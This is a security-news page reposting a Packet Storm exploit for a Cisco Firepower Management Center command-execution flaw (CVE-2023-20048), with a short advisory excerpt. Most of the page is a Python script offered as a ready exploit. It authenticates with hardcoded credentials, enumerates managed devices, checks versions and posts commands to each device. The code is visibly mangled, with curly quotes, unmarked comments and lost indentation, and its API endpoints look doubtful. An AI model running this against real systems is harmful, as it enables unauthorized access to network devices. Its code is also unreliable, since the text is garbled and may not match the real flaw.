Security
Headlines
HeadlinesLatestCVEs

Headline

Cisco Firepower Management Center Remote Command Execution

Cisco Firepower Management Center suffers from an authenticated remote command execution vulnerability. Many versions spanning the 7.x.x.x and 6.x.x.x branches are affected.

Packet Storm
#vulnerability#web#google#cisco#js#auth

Exploit Title: [Cisco Firepower Management Center]

Google Dork: [non]

Date: [12/06/2023]

Exploit Author: Abdualhadi khalifa

Version: [6.2.3.18", "6.4.0.16", "6.6.7.1]

CVE : [CVE-2023-20048]

import requests
import json

set the variables for the URL, username, and password for the FMC web services interface

fmc_url = “https://fmc.example.com”
fmc_user = “admin”
fmc_pass = “cisco123”

create a requests session to handle cookies and certificate verification

session = requests.Session()
session.verify = False

send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token

token_url = fmc_url + “/api/fmc_platform/v1/auth/generatetoken”
response = session.post(token_url, auth=(fmc_user, fmc_pass))

check the response status and extract the access token and refresh token from the response headers

set the access token as the authorization header for the subsequent requests

try:
if response.status_code == 200:
access_token = response.headers[“X-auth-access-token”]
refresh_token = response.headers[“X-auth-refresh-token”]
session.headers[“Authorization”] = access_token
else:
print("Failed to get tokens, status code: " + str(response.status_code))
exit()
except Exception as e:
print(e)
exit()

set the variable for the domain id

change this to your domain id

domain_id = “e276abec-e0f2-11e3-8169-6d9ed49b625f”

send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC

devices_url = fmc_url + “/api/fmc_config/v1/domain/” + domain_id + “/devices/devicerecords”
response = session.get(devices_url)

check the response status and extract the data as a json object

try:
if response.status_code == 200:
data = response.json()
else:
print("Failed to get devices, status code: " + str(response.status_code))
exit()
except Exception as e:
print(e)
exit()

parse the data to get the list of device names and URLs

devices = []
for item in data[“items”]:
device_name = item[“name”]
device_url = item[“links”][“self”]
devices.append((device_name, device_url))

loop through the list of devices and send a GET request to the URL of each device to get the device details

for device in devices:
device_name, device_url = device
response = session.get(device_url)

# check the response status and extract the data as a json object  
try:  
    if response.status_code == 200:  
        data = response.json()  
    else:  
        print("Failed to get device details, status code: " + str(response.status_code))  
        continue  
except Exception as e:  
    print(e)  
    continue

# parse the data to get the device type, software version, and configuration URL  
device_type = data["type"]  
device_version = data["metadata"]["softwareVersion"]  
config_url = data["metadata"]["configURL"]

# check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability  
# use the values from the affected products section in the security advisory  
if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]:  
    print("Device " + device_name + " is vulnerable to CVE-2023-20048")

    # create a list of commands that you want to execute on the device  
    commands = ["show version", "show running-config", "show interfaces"]  
    device_id = device_url.split("/")[-1]

    # loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device  
    # replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute  
    for command in commands:  
        command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command  
        response = session.post(command_url)

        # check the response status and extract the data as a json object  
        try:  
            if response.status_code == 200:  
                data = response.json()  
            else:  
                print("Failed to execute command, status code: " + str(response.status_code))  
                continue  
        except Exception as e:  
            print(e)  
            continue

        # parse the data to get the result of the command execution and print it  
        result = data["result"]  
        print("Command: " + command)  
        print("Result: " + result)

else:  
    print("Device " + device_name + " is not vulnerable to CVE-2023-20048")

Related news

Google Fixes a Seventh Zero-Day Flaw in Chrome—Update Now

Plus: Major security patches from Microsoft, Mozilla, Atlassian, Cisco, and more.

CVE-2023-20048: Cisco Security Advisory: Cisco Firepower Management Center Software Command Injection Vulnerability

A vulnerability in the web services interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to execute certain unauthorized configuration commands on a Firepower Threat Defense (FTD) device that is managed by the FMC Software. This vulnerability is due to insufficient authorization of configuration commands that are sent through the web service interface. An attacker could exploit this vulnerability by authenticating to the FMC web services interface and sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to execute certain configuration commands on the targeted FTD device. To successfully exploit this vulnerability, an attacker would need valid credentials on the FMC Software.

Packet Storm: Latest News

TOR Virtual Network Tunneling Tool 0.4.8.13